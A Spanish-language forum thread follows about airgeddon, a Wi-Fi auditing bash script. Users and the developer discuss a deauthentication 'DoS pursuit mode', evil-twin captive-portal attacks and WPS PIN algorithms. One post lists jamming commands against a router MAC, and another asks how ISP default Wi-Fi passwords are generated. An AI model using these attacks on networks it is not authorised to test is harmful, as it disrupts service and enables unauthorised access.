Es que desde luego no sé porque los script de nuestros dias no tienen una DoS que sique el AP en su canal si cambia...


El mio que esta especial para los rogue AP tiene una DoS activa desde tiempo... y sin mentiroso mira en la web es el unico script que lo hace.. ni Linset Ni Fluxion o otros typos de script lo hacen... tambien tengo opciones para hacer pasa el fake AP en primero pero eso es otra cosa.

Lo digo ahora y no lo voy a decir mas pero el canal del AP es muy importante por cualquier script.



Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 07-10-2017, 18:08 (Sábado)
No entiendo bien lo que pides... tú cuando seleccionas un objetivo ya tienes un canal seleccionado (el del objetivo). Si quieres cambiar el canal, cambia el objetivo.
El punto de acceso cambia el canal. Para iniciar un ataque en otro canal, debe reiniciar el ataque de nuevo. Quería mdk3 para silenciar este punto en todos los canales.
¿Cómo tratar con saltar puntos de acceso?
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 07-10-2017, 18:20 (Sábado)
Ok. Eso se podría implementar en la sección de DoS, pero en la sección de capturar handshake no tiene sentido.

No se, lo consideraré. Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 07-10-2017, 19:07 (Sábado)
Ok. Eso se podría implementar en la sección de DoS, pero en la sección de capturar handshake no tiene sentido.

No se, lo consideraré. Saludos.

Gracias, ¿cuándo se harán los cambios? Quiero probar
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 07-10-2017, 19:29 (Sábado)
Uy... eso va para largo. Estoy aun terminando de preparar la versión 7.22

Esto que comentamos ni siquiera se aún como hacerlo exactamente... hay q hacer pruebas y ver con qué comandos hacerlo. No te puedo decir una fecha concreta... ni siquiera te puedo asegurar 100% q se vaya a poder hacer hasta que no lo pruebe... pero vamos la idea la tengo clara: lanzar el DoS y mientras por debajo escanear para detectar si el mismo bssid está en otro canal, y si se detecta entonces cortar el ataque y lanzarlo de nuevo contra el canal en el que ha sido detectado. Además casa vez q se lanza el ataque hay que controlar los ids de proceso para ir matando el antiguo y lanzar otro, etc. No es algo sencillo.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 07-10-2017, 19:42 (Sábado)
Uy... eso va para largo. Estoy aun terminando de preparar la versión 7.22


¿Qué será nuevo en la versión 7.22?
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 07-10-2017, 19:44 (Sábado)
Mira el changelog disponible ya en la rama dev del proyecto: https://github.com/v1s1t0r1sh3r3/airgeddon/blob/dev/CHANGELOG.md (https://github.com/v1s1t0r1sh3r3/airgeddon/blob/dev/CHANGELOG.md)
Título: Re: Script multiuso en bash, airgeddon
Publicado por: koala633 en 07-10-2017, 19:49 (Sábado)

@ V1s1tor


Citar
hay q hacer pruebas y ver con qué comandos hacerlo. No te puedo decir una fecha concreta... ni siquiera te puedo asegurar 100% q se vaya a poder hacer hasta que no lo pruebe... pero vamos la idea la tengo clara: lanzar el DoS y mientras por debajo escanear para detectar si el mismo bssid está en otro canal, y si se detecta entonces cortar el ataque y lanzarlo de nuevo contra el canal en el que ha sido detectado. Además casa vez q se lanza el ataque hay que controlar los ids de proceso para ir matando el antiguo y lanzar otro, etc. No es algo sencillo.
Publicado por: Nesight1957

Ya sé de lo que hablas... te puedo hechar une mano si quieres conosco un poco los pasos aunque lo he hecho ya.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 07-10-2017, 20:30 (Sábado)
Mira el changelog disponible ya en la rama dev del proyecto: https://github.com/v1s1t0r1sh3r3/airgeddon/blob/dev/CHANGELOG.md (https://github.com/v1s1t0r1sh3r3/airgeddon/blob/dev/CHANGELOG.md)

Gracias por el buen trabajo.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 07-10-2017, 20:32 (Sábado)


@ V1s1tor


Citar
hay q hacer pruebas y ver con qué comandos hacerlo. No te puedo decir una fecha concreta... ni siquiera te puedo asegurar 100% q se vaya a poder hacer hasta que no lo pruebe... pero vamos la idea la tengo clara: lanzar el DoS y mientras por debajo escanear para detectar si el mismo bssid está en otro canal, y si se detecta entonces cortar el ataque y lanzarlo de nuevo contra el canal en el que ha sido detectado. Además casa vez q se lanza el ataque hay que controlar los ids de proceso para ir matando el antiguo y lanzar otro, etc. No es algo sencillo.
Publicado por: Nesight1957

Ya sé de lo que hablas... te puedo hechar une mano si quieres conosco un poco los pasos aunque lo he hecho ya.

No está muy claro lo que escribes. ¿Ya has hecho lo que te pedí?
Título: Re: Script multiuso en bash, airgeddon
Publicado por: koala633 en 07-10-2017, 21:00 (Sábado)
No me ha pedido nada la gente.. soy solamente pidiendo @ V1s1t0r si quiere ayuda para hacer una DoS que sigue el AP en su canal porque tengo un script mio dondé lo he hecho nada mas.

Estas un poco demasiado con prisa a mi gusto amigo...
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 07-10-2017, 21:32 (Sábado)

Estas un poco demasiado con prisa a mi gusto amigo...

Voy a esperar..................
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 08-10-2017, 17:09 (Domingo)
Bloqueo selectivo de redes Wi-Fi y clientes (ataque DoS a puntos de acceso / clientes individuales)
Hay tres opciones:
1. lans --jam --accesspoint ROUTER_MAC
https://github.com/DanMcInerney/LANs.py
2. wifijammer.py -a ROUTER_MAC
https://github.com/DanMcInerney/wifijammer
3. mdk3 wlan0 -a ROUTER_MAC -c
https://github.com/charlesxsh/mdk3-master
Título: Re: Script multiuso en bash, airgeddon
Publicado por: drvalium en 08-10-2017, 17:25 (Domingo)
@Nesight1957, no metas presión, lo hará cuando pueda o le apetezca.

Cuando quieras que salte a tus ordenes, le pones una nómina ¿ok?


saludos
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 08-10-2017, 18:22 (Domingo)
@Nesight1957, no metas presión, lo hará cuando pueda o le apetezca.

Cuando quieras que salte a tus ordenes, le pones una nómina ¿ok?


saludos

Pido disculpas por mi comportamiento si pensabas que estaba presionando a alguien. Sólo quería mejorar el proyecto. Dado que existe el problema con los puntos de acceso que saltan de canal a canal. Después de todo, aquí estamos discutiendo el proyecto y todo el mundo quiere que funcione mejor y haga sugerencias, ¿no? Cuantas más personas estén involucradas, mejor para el proyecto. En las dis****s nace la verdad. Si piensa que esta propuesta no es apropiada, escriba que no necesita hacer esto.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: drvalium en 08-10-2017, 19:44 (Domingo)
Que des sugerencias está bien, gracias a vuestros comentarios las cosas mejoran, pero dale tiempo, la gente tiene una vida fuera del foro, no siempre apetece ponerse a modificar scripts.

saludos
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 08-10-2017, 20:00 (Domingo)
Bueno, gracias.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 08-10-2017, 20:29 (Domingo)
Sí, la verdad es que ando superliado... en otros proyectos, el trabajo, estudiando una certificación también, vida social, etc... y el poco tiempo q tengo lo pongo para esto, pero voy despacio... es que no me da la vida más de sí!!  :P

Lo dicho, la versión 7.22 va a ver la luz casí que ya! y luego para la siguiente (que no puedo prometer nada ni que tendrá ni cuando!), pues le echo un ojo a esto que decís... para hacer DoS que "persiga" al AP ante cambios de canal. Tengo una idea en la cabeza de como hacerlo... pero hasta que no me ponga y haga pruebas... no se, es todo muy abstracto!

Saludos!
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 09-10-2017, 07:23 (Lunes)
Créeme, todos estamos muy agradecidos por tu trabajo.
Saludos!
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 10-10-2017, 20:41 (Martes)
 ???
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Vodker en 10-10-2017, 22:22 (Martes)
Nesight1957 edita ese último mensaje y borra datos, anda...
Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 11-10-2017, 07:06 (Miércoles)
Nesight1957 edita ese último mensaje y borra datos, anda...
Saludos.

¿Qué datos puedo dejar?
Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: drvalium en 11-10-2017, 17:59 (Miércoles)
¿que habías puesto?
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Vodker en 11-10-2017, 18:50 (Miércoles)
¿que habías puesto?

Varios ESSID's con sus MACS y contraseñas, todo al completo.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: drvalium en 11-10-2017, 23:30 (Miércoles)
@Nesight1957 las MAC no se pueden poner, se consideran datos privados. Cuando pongas MAC, solo pon los primeros tres pares, el resto X.

P.e: 60:57:18:XX:XX:XX


Saludos
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 12-10-2017, 08:57 (Jueves)
Bueno.
El proveedor emite dispositivos TP-Link con contraseñas aleatorias generadas por algún algoritmo. Tal vez usted puede decir, tal vez alguien ya ha encontrado tal generación de códigos? Ejemplo:
F8: D1: 11: XX: XX: XX   DTKCA3B   Q2acMYcu
B4: B3: 62: ХХ: ХХ: XX   DTK72AA   LpksgVdk
Saludos
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 14-10-2017, 11:19 (Sábado)
Versión 7.22 released!! con generación offline de PINs y también te permite consultar la base de datos de PIN para un objetivo de forma totalmente offline (sin lanzar ataque). Y por supuesto como ya se había dicho por aquí, algoritmo Arcadyan completamente integrado.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Abanqueiro en 14-10-2017, 13:18 (Sábado)
Cuando intento usar el Evil Twin en modo cautivo siempre me cambia el estado de la interfaz inalámbrica a modo managed, y claro da error. Qué hago mal?
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 14-10-2017, 13:54 (Sábado)
Es normal el cambio a managed. Para crear el punto de acceso ha de ser managed (usa hostapd q así lo requiere). Y para el DoS hace falta modo monitor. Por eso airgeddon lo q hace es duplicar el interfaz creando dos interfaces lógicas de una sola interfaz física, pero vamos q eso funciona bien y está super-probado. Si quieres mándame un privado e intentamos analizar lo q ocurre. En el mensaje dime q sistema operativo usas (imagino q wifislax), la versión del mismo, versión de airgeddon, modelo y chipset de tu tarjeta y describe o pega o pantallazo del error q te da.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 14-10-2017, 21:54 (Sábado)
Versión 7.22 released!! con generación offline de PINs y también te permite consultar la base de datos de PIN para un objetivo de forma totalmente offline (sin lanzar ataque). Y por supuesto como ya se había dicho por aquí, algoritmo Arcadyan completamente integrado.

Muchas gracias, intentémoslo.

Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 15-10-2017, 17:16 (Domingo)
Wifislax-64.1.1 final
v7.11 ----> v7.22
Cuando actualice el escribe:
/usr/bin/language_strings.sh: line 4863: ,Arcadyan: ошибка синтаксиса: ожидается операнд (error token is ",Arcadyan")
ошибка синтаксиса: ожидается операнд (error de sintaxis: operando esperado)
Y la salida del programa.
Después de reiniciar la versión 7.22.

Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 15-10-2017, 19:16 (Domingo)
Hola, en la actualización no da ningún error. Además la línea 4863 del language_strings.sh corresponde a una frase que solo se escribe si se ha calculado correctamente el PIN Arcadyan y si intentas de nuevo calcularlo. Te sale esa frase que según tú está fallando y te dice que ya ha sido calculado antes y te lo muestra.

No soy capaz de reproducir el fallo. Indica los pasos a seguir para poderlo reproducir. Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 15-10-2017, 20:38 (Domingo)
Esto me ha saltado la actualización con la v7.11 en la v7.22. No cuando se trabaja en el programa, a saber cuando se actualiza.
Si continuar con el programa, todo va a funcionar?
(http://www.imageup.ru/img170/thumb/snimok12889248.jpg) (http://www.imageup.ru/img170/2889248/snimok1.png.html)

Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 16-10-2017, 01:07 (Lunes)
Finalmente pude reproducirlo, disculpa.

Problema solucionado! gracias por el reporte.

Ahora no dará error al actualizar. Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 16-10-2017, 06:55 (Lunes)
Muchas gracias.

Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 16-10-2017, 11:46 (Lunes)
Supongo que la gente ya está al tanto de esto:

https://www.krackattacks.com/ (https://www.krackattacks.com/)

En cuanto se libere la herramienta tened por seguro que integraré esto en airgeddon. Menuda fiesta va a ser...
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 16-10-2017, 14:37 (Lunes)
Ya está llenando Github.
https://github.com/vanhoefm/krackattacks

Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: xexudj89 en 16-10-2017, 22:32 (Lunes)
Supongo que la gente ya está al tanto de esto:

https://www.krackattacks.com/ (https://www.krackattacks.com/)

En cuanto se libere la herramienta tened por seguro que integraré esto en airgeddon. Menuda fiesta va a ser...

Has añadido el exprimidor de naranjas de kcdtv es decir el nmk.sh???


https://foro.seguridadwireless.net/colaboracion-y-desarrollo-de-nuestras-lives/exprimir-naranjas-en-wifislax64-1-1/
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 16-10-2017, 23:01 (Lunes)
Si, en la ya lanzada 7.22 el algoritmo Arcadyan está totalmente integrado en la parte wps.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 17-10-2017, 08:17 (Martes)
¿A quien es posible escribir que en una nueva versión Wifislax añadirían el programa WiFi-autopwner?
https://github.com/Mi-Al/WiFi-autopwner
Título: Re: Script multiuso en bash, airgeddon
Publicado por: xexudj89 en 18-10-2017, 19:03 (Miércoles)
¿A quien es posible escribir que en una nueva versión Wifislax añadirían el programa WiFi-autopwner?
https://github.com/Mi-Al/WiFi-autopwner

Creo en este apartado del foro hay un hilo para eso. Peticion de modulos par wifislax.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: xexudj89 en 18-10-2017, 19:04 (Miércoles)
Si, en la ya lanzada 7.22 el algoritmo Arcadyan está totalmente integrado en la parte wps.

Gracias, lo único que falta es que cuando se actualiza cree un modulo para los que usamos versiones Live.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: doctortrapi en 21-10-2017, 22:12 (Sábado)
Buenas noche estimado y admirado  v1s1t0r.
Tengo un pequeño problema y me gustaría saber si podrías ayudarme?
He adquirido el tan afamado adaptador Alfa AWUS036ACH  AC 1200 con el el chip RTL8812au.
y aunque tengo instalado el:
MODULO: Drivers Realtek rtl8812au (astsam)
DESCRIPCION: Drivers Realtek rtl8812au compatibles con modo monitor.
No consigo que funcione.
El Script me detecta la adaptador pero me dice que dicha tarjeta no admite el modo Monitor.
Seria posible alguna solución ?
Muchas gracias y saludo de un fiel seguidor de tu trabajo.  >:(
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 22-10-2017, 10:25 (Domingo)
Hola doctortrapi. La verdad es que no tengo esa tarjeta ni he tenido oportunidad de probarla. Tengo entendido que es buena tarjeta, pero no te sabría decir.

Lo que te puedo decir es que hagas algunas pruebas para ver si está relacionado con airgeddon o con el driver (que es lo más probable). ¿Qué sistema operativo usas? Entiendo que Wifislax. ¿Te ocurre fuera de airgeddon lanzando comandos por tu cuenta? ¿te ocurre en otros sistemas operativos?

Yo probaría eso, bajaría varias live (Wifislax, Kali, etc). y probaría a ponerlas en modo monitor sin airgeddon para ver si el resultado es el mismo. Supongamos que la tarjeta es wlan0. Probaría en wifislax "airmon-zc start wlan0" o en otro sistema operativo "airmon-ng start wlan0" e iría viendo los resultados.

También aprovecho el post para anunciar un poco en lo que se va a trabajar ahora en airgeddon. Se está añadiendo soporte de idioma polaco y en un futuro próximo quiero dar soporte para redes de 5ghz, aunque esto tardará pues tengo que comprarme aún un adaptador que soporte dicha banda. Estaba dudando precisamente si comprar este Realtek que comenta doctortrapi u otro. Así que los resultados de las pruebas que hagas me interesan.

Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: drvalium en 22-10-2017, 18:29 (Domingo)
Ese chip no funciona con los scripts automáticos, hay que usar Reaver directamente.


saludos
Título: Re: Script multiuso en bash, airgeddon
Publicado por: doctortrapi en 22-10-2017, 19:31 (Domingo)
Buenas tardes a todos y agradecer a v1s1t0r haber respondido tan rapidamente a mi solicitud de ayuda.
Con respecto a tu pregunta estoy utilizando wifislax 64 1.1. en modo live usb.

https://photos.app.goo.gl/yXK8GbW3OYDaEFZy1

Espero puedas ver las capturas.

gracias por todo.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 22-10-2017, 20:10 (Domingo)
Hola, veo en las capturas como lo pones en modo monitor con el comando "iwconfig wlan1 mode monitor", pero no has probado lo que te comenté. Prueba desde managed a lanzar "airmon-zc start wlan1" y a ver que te dice. Si te falla, entonces no tiene que ver con airgeddon ya que te ocurriría fuera también. Si te funcionase ya me parecería raro.

Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: doctortrapi en 23-10-2017, 16:21 (Lunes)
Hola V1s1t0r respondiendo a tu peticion he hecho lo que me has pedido y ha sido imposible ponerla con airmon-zc en modo monitor.
te envio capturas para que valores y saques conclusiones.
Muchas gracias por tu Tiempo y trabajo.
si necesitas otra prueba solo tienes que pedirla.

https://photos.app.goo.gl/ixhZWMZIpfKYeqbb2
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 23-10-2017, 16:32 (Lunes)
Como ves, es un error que ocurre también fuera de airgeddon. No creo que yo pueda hacer mucho... demasiado que controlo errores "no controlados" para pintar un "este interfaz no soporta el modo monitor".

No se que decirte, cambia a monitor a mano con el otro método antes de entrar al script. ¿Probaste con una live de otro sistema operativo? más que por el sistema operativo es por usar otro driver también. Un kali, un parrot o similar. A veces, las pequeñas variaciones del driver de uno a otro sistema operativo nos pueden arreglar o fastidiar. Uno va probando hasta que da con el driver o la distro que le va bien a su tarjeta.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: ferlan en 24-10-2017, 01:38 (Martes)
Si, en la ya lanzada 7.22 el algoritmo Arcadyan está totalmente integrado en la parte wps.

Entre las dependencias para el algoritmo Arcadyan está reaver, y más concretamente, wash cuya versión es distinta a la que equipa wifislax64.1.1 y que supongo que si se cambian dejarán de funcionar bien otros scripts.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 24-10-2017, 02:26 (Martes)
Si, en la ya lanzada 7.22 el algoritmo Arcadyan está totalmente integrado en la parte wps.

Entre las dependencias para el algoritmo Arcadyan está reaver, y más concretamente, wash cuya versión es distinta a la que equipa wifislax64.1.1 y que supongo que si se cambian dejarán de funcionar bien otros scripts.

WIFISLAX , TIENE lo que se necesita , admeas deje en modulos un  update de reaver.. los ejecutables se llaman distinto , asi un script llama a un ejecutbale u otro ..  ya esto lo he explicado chorrocientos de veces.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 24-10-2017, 15:14 (Martes)
Hola, aprovecho para preguntar por aquí vuestras opiniones y experiencias. El caso es que me quiero comprar una tarjeta wireless usb que tenga soporte de 5ghz. Tengo previsto dar soporte de 5ghz a airgeddon en un futuro próximo y para ello necesito una buena antena.

No se si habrá en el mercado alguna "antena mágica" que tenga todo esto (la lista a los reyes magos):
-Que soporte modo monitor <- este era obvia!  :P
-Que funcione con bully y reaver <- por eso paso de Ralink esta vez!
-Que no haya que instalar drivers "raros" o parcheados, que con los default de los principales sistemas operativos de pentesting funcione (Wifislax, Kali, Parrot)

Lo de que funcione con los drivers que trae por defecto un S.O. es más bien para que cuando actualice el sistema (incluyendo el kernel), no se me vaya al garete el funcionamiento. Si los drivers son estándar y están soportados en en estas distros, supongo con un update de kernel va acompañado el paquete de turno del driver también. Por eso prefiero evitar las tarjetas que requieren un driver bajado de por ahí y compilado a mano.

¿Alguna sugerencia? por suerte no me importa si cuesta 30, 40 o 50 euros. Lo que necesito es que funcione bien. Saludos y gracias.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: ferlan en 24-10-2017, 18:08 (Martes)
Si, en la ya lanzada 7.22 el algoritmo Arcadyan está totalmente integrado en la parte wps.

Entre las dependencias para el algoritmo Arcadyan está reaver, y más concretamente, wash cuya versión es distinta a la que equipa wifislax64.1.1 y que supongo que si se cambian dejarán de funcionar bien otros scripts.

WIFISLAX , TIENE lo que se necesita , admeas deje en modulos un  update de reaver.. los ejecutables se llaman distinto , asi un script llama a un ejecutbale u otro ..  ya esto lo he explicado chorrocientos de veces.

Ya lo sé, USUARIONUEVO, (y es de agradecer), por eso digo que esa parte del script de v1s1t0r no funcionará correctamente, pues llama a wash no a wash_t6x.
Ello no es óbice para que cada cual nos las arreglemos como podamos para probar el script, que salvo este hándicap, va bien.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 29-10-2017, 21:37 (Domingo)
Hola, creo que al final compraré para soporte 5ghz la tarjeta Alfa AWUS052NHS con chipset Ralink RT3572: https://www.alfa.com.tw/products_show.php?pc=67&ps=231 (https://www.alfa.com.tw/products_show.php?pc=67&ps=231)

¿Experiencias? ¿la tiene alguien? ¿pasa a monitor sin problemas? ¿funciona con los O.S típicos de pentest como Wifislax, Kali u otros? ¿funciona con reaver/bully? si alguien pudiera compartir su experiencia sería genial. Gracias.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 30-10-2017, 23:10 (Lunes)
Imagino que no la tiene nadie por aquí... una pena. Tendré que arriesgarme. Si me porto bien igual me la trae Papá Noel  ;D

Mientras tanto y hasta que no pueda comenzar con el soporte 5ghz de airgeddon, he ido haciendo cositas... en la rama de desarrollo "dev" ya se puede ir probando lo que alguien sugirió por aquí y que yo he denominado el "DoS modo persecución"... la verdad es que en inglés suena mejor "DoS pursuit mode"  >:D

Que viene siendo pues eso... que en el apartado de DoS del script, al lanzar una ataque, además del propio ataque DoS, también se lanza en background un escaneo con airodump. Y si se detecta que el AP ha cambiado de canal (ya sea por un reinicio estando configurado en canal auto, como cambio manual o por el motivo que sea), pues te avisa y relanza el ataque de nuevo contra el canal nuevo.

Ale, Nesight1957 ya puedes irlo probando. Pasará a master en la próxima versión 7.23, pero esta tiene pinta de que va a tardar... las traducciones al polaco no van muy rápido!
Título: Re: Script multiuso en bash, airgeddon
Publicado por: bzbs en 31-10-2017, 09:11 (Martes)
Lo de detectar el cambio de canal está muy bien, lo hará de forma automática o "sólo" avisará?

por cierto no se si tiene que ver, pero haciendo ataques deauth, me fije que echa a todo el canal, es decir, no sólo al AP objetivo si no todos los AP que estén en el canal, eso se podría "arreglar" de alguna forma o es "técnicamente" imposible? pregunto porque pasa con apfucker, airstorm, etc..

respecto al adaptador 5ghz yo sólo tengo la awus036ach, que por cierto con la salida de la awus1900 ha bajado un poco en amazon... la uso en kali y todo perfecto excepto ataques deauth que parece que aun es wip.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 31-10-2017, 11:25 (Martes)
Si, lo hace todo solo. Detecta el cambio, mata el proceso del ataque y lanza uno nuevo en el canal adecuado además de notificartelo por pantalla para que sepas lo que ha ocurrido y en el mensaje te indica el canal nuevo en el que se está lanzando ahora el ataque.

Respecto a eso que comentas de que se cae el canal entero... no debería, tanto en el ataque de mdk3 amok, como en el de aireplay va el bssid del AP objetivo especificado y solo debería afectarle a dicho AP. Y en el ataque de wids confusion va el essid. No obstante, lo voy a probar.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 31-10-2017, 15:47 (Martes)
Hola, creo que al final compraré para soporte 5ghz la tarjeta Alfa AWUS052NHS con chipset Ralink RT3572: https://www.alfa.com.tw/products_show.php?pc=67&ps=231 (https://www.alfa.com.tw/products_show.php?pc=67&ps=231)
Tengo tal adaptador. Funciona con todos los programas sin problemas. No noté ningún problema, aunque solo a 2.4GHz, todavía no tenemos 5GHz. Te aconsejo que compres exactamente eso. Sólo funciona bajo el controlador de RT2870/RT3070.
Saludos/
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 31-10-2017, 16:00 (Martes)
Ale, Nesight1957 ya puedes irlo probando. Pasará a master en la próxima versión 7.23, pero esta tiene pinta de que va a tardar... las traducciones al polaco no van muy rápido!

¿Y cuándo será posible probar la versión 7.23?
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 01-11-2017, 00:12 (Miércoles)
Pues como decía, tardará en pasar a master y actualizarsele a todo el mundo, pero ya se puede probar si descargas la versión del branch "dev". Es muy sencillo: git clone -b dev https://github.com/v1s1t0r1sh3r3/airgeddon.git
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 01-11-2017, 09:23 (Miércoles)
Hay una sugerencia para hacer cambios en los ataques del gemelo malvado en la imagen de wifimosys. No detenga el ataque de DOS antes de atrapar Hanshake, tan pronto como atrapemos händshake, automáticamente verificamos el apretón de manos, activamos el punto de acceso falso y continuamos atrapando a händshake. Esto elimina el error de hanshake.
Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 01-11-2017, 10:09 (Miércoles)
Hola, creía que ibas a dar un feedback del trabajo realizado.

En cuanto a eso que sugieres, no se que es wifimosys ni me interesa, pero no tiene sentido lo q dices. Si quieres atrapar un handshake tienes que dejar que el cliente conecte, por lo que no tiene sentido no parar el DoS. Queremos parar el Dos para que el cliente pueda conectarse y así capturar el handshake. A mi me funciona muy bien, no se a que errores de handshake te refieres.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 01-11-2017, 10:51 (Miércoles)
Me refería al error "apretón de manos dañado" al registrar Pyrit. De acuerdo, sobre esto más tarde. Voy a probar 7.23 esta noche. Comentarios Escribiré mañana.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 02-11-2017, 07:44 (Jueves)
Ayer por la noche probé el nuevo script 7.23. No vi nada. El punto de acceso funcionó en el canal 10, luego, luego de un tiempo, cambió al canal 7. En el programa, sin reacción. ¿Qué hice mal? Programa Wifislax64-1.1, adaptador TL-WN722N.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 02-11-2017, 20:24 (Jueves)
Hola, es dificil saber si lo has hecho bien si no indicas ningun dato ni dices que es lo que has hecho exactamente. Te diré yo como se hace:

Abres airgeddon 7.23 y vas al menú de DoS (opción 4). Tarjeta en modo monitor, elijes objetivo, etc... y luego tras seleccionar un ataque DoS (preferiblemente las opciones 5, 6 o 7 que son mdk3 amok, aireplay o mdk3 wids confusion) airgeddon te hará una pregunta. Te preguntará si quieres activar en el ataque el "modo persecución". Por supuesto habrá que decirle que sí y una vez se lance el ataque tú ya no tienes que hacer nada más. airgeddon automáticamente si detecta un cambio de canal del AP objetivo te notificará que el AP objetivo ha cambiado de canal y relanzará el ataque DoS de nuevo.

Pruébalo, verás que funciona muy bien, yo lo he probado con mis puntos de acceso forzando el cambio de canal incluso manualmente en la configuración del AP durante el ataque y el cambio lo detecta muy bien porque en segundo plano está ejecutando un airodump-ng que va escaneando el entorno.

Si queréis que ponga por aquí algún pantallazo o algo para que veais como es esto, me lo decís y lo pongo, sin problemas. Pero Nesight1957, si tienes más problemas escríbeme un email para no llenar este hilo de datos sobre pruebas. Si lo prefieres escríbeme en inglés ya que es evidente que utilizas un google translate para escribir en español. Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 03-11-2017, 08:05 (Viernes)
Gracias, lo tendré en cuenta.
Revisé "DoS modo persecución" en "evil twin", en "evil twin" "DoS modo persecución" no funciona. Es muy necesario que el régimen "DoS modo persecución" funcione en el "evil twin".
Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 03-11-2017, 10:11 (Viernes)
No es que no funcione. Es que no está implementado. Solo está en el DoS del apartado de DoS.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 03-11-2017, 10:29 (Viernes)
No es que no funcione. Es que no está implementado. Solo está en el DoS del apartado de DoS.

Realmente apreciaría si haces "DoS modo persecución" para "evil twin".
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 03-11-2017, 20:19 (Viernes)
Ale, implementado... he tardado todo el día en programar la integración del modo persecución DoS con los Evil Twin. No ha sido nada fácil!  :P

Eso sí, ahora ya me tenéis que dar vacaciones! ¿no?  ;)
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 03-11-2017, 20:26 (Viernes)
Bien hecho, gracias por el trabajo. También necesitas descansar.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 03-11-2017, 23:07 (Viernes)
Gracias por el programa, por supuesto, pero no puedo leer lo que enviaste. Está encriptado
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 04-11-2017, 02:04 (Sábado)
¿? Encriptado? Ya está disponible en la 7.23. Borra la que bajaste y descargala de nuevo con git clone -b dev <url>
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 04-11-2017, 15:08 (Sábado)
Hay problemas ...

Después de haber implementado todo, la integración del DoS pursuit mode con los Evil Twin no está funcionando bien. Es decir, el DoS pursuit mode por sí solo, en el apartado de DoS funciona muy bien, pero parece que en la integración con los Evil Twin algo está pasando... me explico:

